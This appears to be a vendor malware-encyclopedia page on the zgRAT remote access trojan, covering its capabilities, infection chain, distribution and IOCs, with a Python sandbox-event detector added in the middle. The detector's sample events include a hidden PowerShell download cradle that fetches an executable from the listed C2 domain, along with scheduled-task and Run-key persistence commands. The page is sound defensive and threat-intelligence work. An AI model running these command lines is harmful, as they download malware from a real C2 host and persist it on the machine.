
zgRAT

Global rank: 105
Month rank: 90
Week rank: 64

zgRAT is a malware known for its ability to infect systems and exfiltrate sensitive data to command-and-control (C2) servers. It is primarily distributed through loader malware, as well as phishing emails. zgRAT employs various advanced techniques, including process injection and code obfuscation, to evade detection and maintain persistence on infected systems. The malware can also spread via USB drives and uses popular messaging platforms like Telegram and Discord for data exfiltration.

Type: RAT
Origin: Unknown
First seen: 1 April, 2021
Last seen: 11 February, 2025


IOCs

IP addresses: 94.156.105.136
Domains: cornpop.cloudns.be


What is zgRAT malware?

zgRAT, a remote access trojan (RAT), has been active in the cybersecurity landscape since its launch in 2021. This malware is designed to infect systems, collect sensitive data, and exfiltrate the stolen information to command-and-control (C2) servers.

zgRAT is primarily distributed through loader malware such as PrivateLoader and SmokeLoader, which act as delivery mechanisms for the RAT. Interestingly, researchers have noted that some samples of zgRAT can be mistaken for PureCrypter due to shared code elements.

With ANY.RUN’s Interactive Sandbox, we can safely execute a zgRAT sample and analyze its behavior on a live system.

[Figure: Analysis of a malicious zgRAT process inside the ANY.RUN sandbox]

As observed in this sandbox session, the dropped threat is detected immediately after it attempts to gain a foothold on the machine.


zgRAT malware technical details

zgRAT is equipped with advanced capabilities to perform malicious activities on the infected machines, including:

  • Keylogging: zgRAT can record every keystroke, capturing information like usernames, passwords, and financial data, which is then sent to attackers.
  • Theft of sensitive data: The malware scans infected systems for valuable information, including browser credentials, which it exfiltrates to C2 servers.
  • Dropping additional malware: zgRAT can download and install other malicious software, further compromising the security of the infected device.
  • Worm-like behavior: zgRAT can spread through USB drives, automatically executing and infecting new devices when connected.
  • Exfiltration via Telegram and Discord: The malware uses popular messaging platforms like Telegram and Discord for data exfiltration, bypassing traditional security measures and making detection more difficult.
  • Process Injection: zgRAT employs process injection to evade detection, injecting its malicious code into legitimate processes to operate stealthily and persist on infected systems.
  • Use of scripts: The malware utilizes scripts embedded in various file types to download its payload, making it easier to bypass security measures and gain a foothold on target devices.
  • Code obfuscation: zgRAT obfuscates its code to hinder analysis and signature-based identification, allowing it to remain undetected for longer periods.

Analysis of zgRAT Execution Process

Use ANY.RUN’s Interactive Sandbox to analyze malicious files and URLs. Check out this analysis of a zgRAT sample.

[Figure: Analysis of a zgRAT sample inside the ANY.RUN sandbox]

zgRAT is often spread through phishing emails containing malicious attachments like Windows Shortcut (LNK) files or Batch scripts (BAT). Opening these attachments triggers a script that drops additional payloads onto the system. The initial script may download and execute a malicious executable, continuing the infection process.

[Figure: Process graph of a zgRAT execution chain as shown by the ANY.RUN sandbox]

To evade detection, zgRAT uses obfuscation techniques such as packing, dynamic code generation, and XOR encryption. It also employs anti-tampering protections similar to ConfuserEx and loads extra DLLs to execute obfuscated methods. The malware complicates static analysis by making dynamic function calls via randomly named wrapper methods.

For persistence, zgRAT modifies registry entries or creates scheduled tasks to run automatically on startup. It creates mutexes to prevent multiple instances and communicates with a command and control (C2) server, allowing attackers to send commands and exfiltrate data. zgRAT can steal sensitive information through keylogging and screen capturing, and as a Remote Access Trojan (RAT), it enables remote control of infected machines, command execution, and file manipulation without user consent.
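The execution chain above (script attachment, download of the payload, execution from a temporary directory, then Run-key or scheduled-task persistence) can be turned into a simple detection over sandbox process events. The following is an added example, not ANY.RUN's code: the event records are constructed, the hostnames come from this page's IOC section, and PLACEHOLDER stands in for file and task names the page does not give.

```python
import re
# Indicators from this page's IOC section; everything else below is constructed.
IOC_HOSTS = {"cornpop.cloudns.be", "94.156.105.136"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
SCRIPT_EXT = re.compile(r"\.(lnk|bat|cmd|vbs|js|ps1)\b", re.I)
DOWNLOAD = re.compile(r"invoke-webrequest|downloadstring|downloadfile|certutil|curl", re.I)
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.I)
TEMP_PATH = re.compile(r"\\(AppData\\Local\\Temp|Temp)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)

# Constructed sandbox-style events for the chain described above (BAT attachment -> script
# downloads payload -> payload runs from Temp -> Run key + scheduled task). PLACEHOLDER
# stands in for file and task names the page does not give.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 200, "ppid": 100, "image": "cmd.exe", "path": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\Downloads\invoice.bat"'},
    {"type": "process", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest http://cornpop.cloudns.be/PLACEHOLDER.exe "
                r"-OutFile C:\Users\user\AppData\Local\Temp\PLACEHOLDER.exe"},
    {"type": "process", "pid": 400, "ppid": 300, "image": "PLACEHOLDER.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\PLACEHOLDER.exe", "cmdline": "PLACEHOLDER.exe"},
    {"type": "registry", "pid": 400, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"type": "process", "pid": 500, "ppid": 400, "image": "schtasks.exe", "path": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc onlogon /tn PLACEHOLDER /tr C:\Users\user\AppData\Local\Temp\PLACEHOLDER.exe"},
]

def analyze(events):  # -> list of (pid, tag, detail) findings for the zgRAT-style chain
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    def ancestors(pid):  # parent-chain image names, nearest first
        while procs[pid]["ppid"] in procs:
            pid = procs[pid]["ppid"]
            yield procs[pid]["image"].lower()

    # Autorun values written under a Run key are persistence regardless of the writing process.
    findings = [(e["pid"], "persistence_run_key", e["key"]) for e in events
                if e["type"] == "registry" and RUN_KEY.search(e["key"])]
    for pid, e in procs.items():
        img, cmd = e["image"].lower(), e["cmdline"]
        m = SCRIPT_EXT.search(cmd)
        if img in SCRIPT_HOSTS and m:  # script host started on an LNK/BAT-style attachment
            findings.append((pid, "script_attachment", m.group(0).lower()))
        if DOWNLOAD.search(cmd):  # download cradle; stronger tag when the host is a listed IOC
            host = next(iter(URL_HOST.findall(cmd)), "").lower()
            findings.append((pid, "download_known_ioc" if host in IOC_HOSTS else "download_cradle", host))
        if TEMP_PATH.search(e["path"]) and SCRIPT_HOSTS & set(ancestors(pid)):
            findings.append((pid, "exec_from_temp_under_script", e["path"]))
        if img == "schtasks.exe" and "/create" in cmd.lower():
            findings.append((pid, "persistence_schtask", cmd))
    return findings
```

A single finding such as a download cradle is common in benign administration; the chain is what matters, so alert on the combination of an attachment-launched script host, a download, execution from Temp and a persistence write rather than on any one tag.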


zgRAT distribution methods

One of the most common techniques for distributing zgRAT is through phishing emails, which trick users into downloading and executing malicious attachments or clicking on links that lead to the download of malware.

zgRAT is frequently dropped by loader malware that acts as an intermediary, ensuring that zgRAT is delivered efficiently to infected systems. Some loaders have also been observed using malvertising, particularly through Google Ads. Malvertising relies on malicious advertisements that, when clicked, redirect users to websites that download and install malicious software.

Collecting zgRAT Threat Intelligence

Threat Intelligence Lookup helps security professionals keep up with the latest samples and indicators of zgRAT.

The service provides access to an extensive database containing insights from millions of malware analysis sessions conducted in the ANY.RUN sandbox. With over 40 search parameters, users can find specific data related to threats, including IP addresses, domains, file names, process artifacts, mutexes, etc.

[Figure: TI Lookup provides a list of sandbox sessions featuring zgRAT malware]

For instance, context on zgRAT can be found with a query such as threatName:"zgRAT". This returns all related samples and sandbox results relevant to this remote access trojan.


Conclusion

zgRAT malware represents a significant threat to businesses, with its advanced capabilities and sophisticated distribution methods. Its ability to steal sensitive data, spread via USB drives, and exfiltrate information through popular messaging platforms makes it a serious security concern.

To ensure proactive identification of malicious content, use ANY.RUN’s Interactive Sandbox that lets you quickly run analysis of any file and URL to determine if it poses a risk.

